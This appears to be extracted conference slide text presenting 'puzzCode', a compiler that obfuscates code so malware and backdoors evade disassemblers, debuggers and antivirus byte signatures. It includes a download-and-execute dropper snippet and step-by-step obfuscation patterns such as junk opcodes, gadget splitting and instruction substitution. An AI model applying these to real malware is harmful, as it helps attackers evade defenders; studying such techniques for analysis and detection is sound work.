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puzzCode: Make Backdoors Great Again!

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Here's the 2 main points of this presentation

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1. How to defend malware against analysis 2. How to bypass malware signature Here's the 2 main points of this presentation

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How is a malware made?

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#include #include #pragma comment(lib, "urlmon.lib") int main(int argc, char* argv[]) { URLDownloadToFileA ( NULL, "", "malware.exe", 0, NULL ); system("malware.exe"); return 0; } dropper.c

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; int __cdecl main(int argc, const char **argv, const char **envp) push ebp mov ebp, esp push 0 ; LPBINDSTATUSCALLBACK push 0 ; DWORD push offset szFileName ; "malware.exe" push offset szURL ; "" push 0 ; LPUNKNOWN call URLDownloadToFileA push offset command ; "malware.exe" call _system add esp, 4 xor eax, eax pop ebp retn dropper.asm

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; int __cdecl main(int argc, const char **argv, const char **envp) push ebp // 55 mov ebp, esp // 8B EC push 0 // 6A 00 push 0 // 6A 00 push 0x406030 // 68 30 60 40 00 push 0x40603c // 68 3C 60 40 00 push 0 // 6A 00 call URLDownloadToFileA // E8 E2 3C 00 00 push 0x406060 // 68 60 60 40 00 call _system // E8 07 00 00 00 add esp, 4 // 83 C4 04 xor eax, eax // 33 C0 pop ebp // 5D retn // C3 dropper.asm → Native Code

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dropper.asm → Native Code →exe DOS Program ⋯⋯ HT Header .text Section ⋯⋯ 55 8B EC 6A 00 6A 00 ... ; int __cdecl main(int argc, const char **argv, const char **envp) push ebp // 55 mov ebp, esp // 8B EC push 0 // 6A 00 push 0 // 6A 00 push 0x406030 // 68 30 60 40 00 push 0x40603c // 68 3C 60 40 00 push 0 // 6A 00 call URLDownloadToFileA // E8 E2 3C 00 00 ...

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What Reseachers Can Do, DOS Program ⋯⋯ NT Header .text Section ⋯⋯ 55 8B EC 6A 00 6A 00 ... If They Get A EXE File like This?

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How Researcher Analyze A Malware?

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1. Static analysis tool • IDA Pro: • BinNavi: • Snowman: • ... 2. Dynamic analysis tool • x64 Dbg: • ollyDbg: • Immunity Debugger: • ... 3. Sandbox • Cuckoo: How Researcher Analyze A Malware?

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1. Static analysis tool • IDA Pro: • BinNavi: • Snowman: • ... 2. Dynamic analysis tool • x64 Dbg: • ollyDbg: • Immunity Debugger: • ... 3. Sandbox • Cuckoo: How Researcher Analyze A Malware?

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Question 1) How Does Static Analysis Tools Work?

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How Static Analysis Tools Do? DOS Program ⋯⋯ HT Header .text Section ⋯⋯ 55 8B EC 6A 00 6A 00 ... Grab those opcodes of the EXE file

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push ebp mov ebp, esp push 0 ; LPBINDSTATUSCALL push 0 ; DWORD push offset szFileName ; "malware.exe" push offset szURL ; " push 0 ; LPUNKNOWN How Static Analysis Tools Do? DOS Program ⋯⋯ HT Header .text Section ⋯⋯ 55 8B EC 6A 00 6A 00 ... Grab those opcodes of the EXE file And transform opcodes into assembly instructions

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Calling Convention int callee(int, int, int); int caller(void) { return callee(1, 2, 3) + 5; } caller: push ebp mov ebp, esp push 3 push 2 push 1 call callee add eax, 5 add esp, 12 mov esp, ebp pop ebp ret

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Calling Convention int callee(int, int, int); int caller(void) { return callee(1, 2, 3) + 5; } caller: push ebp mov ebp, esp push 3 push 2 push 1 call callee add eax, 5 add esp, 12 mov esp, ebp pop ebp ret Compiler Should follow C/C++ Calling Convention to Generate Assembly Instructions!

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Calling Convention int callee(int, int, int); int caller(void) { return callee(1, 2, 3) + 5; } caller: push ebp mov ebp, esp push 3 push 2 push 1 call callee add eax, 5 add esp, 12 mov esp, ebp pop ebp ret therefore, it's easy for analysis tools, just follow calling convention, and turn it back to C/C++ codes, ...Right?

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Calling Convention int callee(int, int, int); int caller(void) { return callee(1, 2, 3) + 5; } caller: push ebp mov ebp, esp push 3 push 2 push 1 call callee add eax, 5 add esp, 12 mov esp, ebp pop ebp ret If Hackers Call a function, but they don't want to follow calling convention syntax? :P

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msgbox.c IDA Pro #include const char *lptext = "hi there!"; const char *lptitl = "info"; int main() { __asm { push 0 push lptitl push lptext push 0 call MessageBoxA } //MessageBoxA(0, lptext, lptitl, 0); return 0; }

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msgbox.c IDA Pro #include const char *lptext = "hi there!"; const char *lptitl = "info"; int main() { __asm { push 0 push lptitl push lptext push 0 call newfunc ret newfunc: add esp, 4 call MessageBoxA } return 0; }

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msgbox.c IDA Pro int main() { __asm { push 0 call func_00; ret func_00: add esp, 4 push lptitl call func_01; ret func_01: add esp, 4 push lptext call func_02; ret func_02: add esp, 4 push 0 call func_03; ret func_03: add esp, 4 call MessageBoxA } ...

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msgbox.c IDA Pro int main() { __asm { push 0 call func_00; ret func_00: add esp, 4 push lptitl call func_01; ret func_01: add esp, 4 push lptext call func_02; ret func_02: add esp, 4 push 0 call func_03; ret func_03: add esp, 4 call MessageBoxA } ...

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- Pack each instructions into new function-like gadgets - Breaking each function call syntax into countless pieces - Insert some useless codes into original instrctions 1. nop 2. lodsb 3. mov edi, edi ...etc - Turn Original Instrctions into Similar Codes Set 4. mov eax, ebx => push ebx; pop eax 5. push 0 => sub esp, 4; mov [esp], 0 6. sub esp, 4 => lea esp, [esp-4] Core Idea

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Question 2) How to bypass Malware Signature Check?

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./shellBlog.c #include void malFunc(void) { char malData[] = "explorer"; system(malData); /* display my blog :P */ } int main(void) { malFunc(); }

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./shellBlog.c .text:00401600 malFunc proc near .text:00401600 push ebp .text:00401601 mov ebp, esp .text:00401603 sub esp, 0x38 .text:00401606 mov [ebp - 0x20], 0x6C707865 // "lpxe" .text:0040160D mov [ebp - 0x1C], 0x7265726F // "rero" .text:00401614 mov [ebp - 0x18], 0x74746820 // "tth " .text:0040161B mov [ebp - 0x14], 0x2F2F3A70 // "//:p" .text:00401622 mov [ebp - 0x10], 0x6D633033 // "mc03" .text:00401629 mov [ebp - 0x0C], 0x0077742E // "wt." .text:00401630 lea eax, [ebp - 0x20] .text:00401633 mov [esp], eax ; Command .text:00401636 call system .text:0040163C leave .text:0040163D retn

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./shellBlog.exe MicroSoft Protable Executable File (*.exe)

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./shellBlog.exe DOS Program ⋯⋯ NT Header .text Section ⋯⋯

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./shellBlog.exe DOS Program ⋯⋯ NT Header .text Section ⋯⋯ malFunc 55 8B EC 81... ⋯⋯ ⋯⋯ Offset .text:00401600 malFunc proc near .text:00401600 push ebp .text:00401601 mov ebp, esp .text:00401603 sub esp, 0x38 .text:00401606 mov [ebp - 0x20], 0x6C707865 // "lpxe" .text:0040160D mov [ebp - 0x1C], 0x7265726F // "rero" .text:00401614 mov [ebp - 0x18], 0x74746820 // "tth "

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./shellBlog.exe DOS Program ⋯⋯ NT Header .text Section ⋯⋯ malFunc 55 8B EC 81... ⋯⋯ ⋯⋯ Offset .text:00401600 malFunc proc near .text:00401600 push ebp .text:00401601 mov ebp, esp .text:00401603 sub esp, 0x38 .text:00401606 mov [ebp - 0x20], 0x6C707865 // "lpxe" .text:0040160D mov [ebp - 0x1C], 0x7265726F // "rero" .text:00401614 mov [ebp - 0x18], 0x74746820 // "tth " bool chkVirus(PBYTE mem) { /* 55 - push ebp 8b ec - mov ebp, esp 81 EC 38 00 00 00 - sub esp,00000038 */ char Signature[] = "\x55\x8B\xEC\x81\xEC\x38\x00"; return !strncmp((char *)mem+offset, Signature, 7); }

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⋯⋯ ⋯⋯ malFunc ⋯⋯ ⋯⋯ Offset shellBlog.exe ⋯⋯ ⋯⋯ malFunc ⋯⋯ ⋯⋯ Offset shellBlog1.exe Junk ⋯⋯ ⋯⋯ malFunc ⋯⋯ Offset shellBlog2.exe Junk Junk Junk

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⋯⋯ ⋯⋯ malFunc ⋯⋯ ⋯⋯ Offset shellBlog.exe ⋯⋯ ⋯⋯ malFunc ⋯⋯ ⋯⋯ Offset shellBlog1.exe Junk ⋯⋯ ⋯⋯ malFunc ⋯⋯ Offset shellBlog2.exe Junk Junk Junk If malicious function of the same source code change every time after compiled, it'll be a big challenge for nowadays Anti-Virus :)

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puzzCode: A Compiler Designed to Build Your Backdoors!

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General Compiler Source.cpp Object Files Main.exe Compiler Assembly Codes Assembler Linker

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puzzCode Source.cpp Object Files Main.exe MinGW Compiler Assembly Codes Assembler Linker

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puzzCode Source.cpp Object Files Main.exe MinGW Compiler Assembly Codes Assembler Linker Scanning Assembly Codes void func_00(); int func_01(int); int func_02(int, char*); ... Get Functions of those Codes

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Assembly Codes void func_00(); int func_01(int); int func_02(int, char*); ... __asm { push 0 push lptitl push lptext push 0 call MessageBoxA } __asm { push 0 push lptitl push lptext push 0 call newfunc ret newfunc: add esp, 4 call MessageBoxA } __asm { push 0 call func_00; ret func_00: add esp, 4 push lptitl call func_01; ret func_01: add esp, 4 push lptext call func_02; ret func_02: add esp, 4 push 0 call func_03; ret func_03: add esp, 4 call MessageBoxA } Obfuscate Spatially

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Assembly Codes void func_00(); int func_01(int); int func_02(int, char*); ... __asm { push 0 push lptitl push lptext push 0 call MessageBoxA } __asm { push 0 nop push lptitl lodsb push lptext mov edi, edi push 0 call MessageBoxA } __asm { push 0 nop call func_00; ret func_00: lodsb add esp, 4 push lptitl call func_01; ret func_01: add esp, 4 push lptext mov edi, edi call func_02; ret func_02: add esp, 4 push 0 call func_03; ret func_03: add esp, 4 call MessageBoxA Obfuscate with Junk Codes

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Assembly Codes void func_00(); int func_01(int); int func_02(int, char*); ... __asm { push 0 push lptitl push lptext push 0 call MessageBoxA } __asm { sub esp, 4 mov [esp], 0 push lptitl push lptext sub esp, 4 mov [esp], 0 call MessageBoxA } Obfuscate with Similar Instructions __asm { lea esp, [esp-0x10] mov [esp+0x0c], 0 mov [esp+0x08], lptitl mov [esp+0x04], lptext mov [esp+0x00], 0 push retn push MessageBoxA ret retn: }

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puzzCode Source.cpp Object Files Main.exe MinGW Compiler Assembly Codes Assembler Linker Assembly Codes Confused

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puzzCode Source.cpp Object Files Main.exe MinGW Compiler Assembly Codes MinGW Assembler Linker Assembly Codes Confused

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puzzCode Source.cpp Object Files Main.exe MinGW Compiler Assembly Codes MinGW Assembler MinGW Linker Assembly Codes Confused

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puzzCode (Clear)

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puzzCode (Confused)

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puzzCode (x64 Debugger)

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puzzCode (Snowman)

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puzzCode You Can Compile different *.exe With the same source codes

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Thanks! @aaaddress1 Project PuzzCode Slides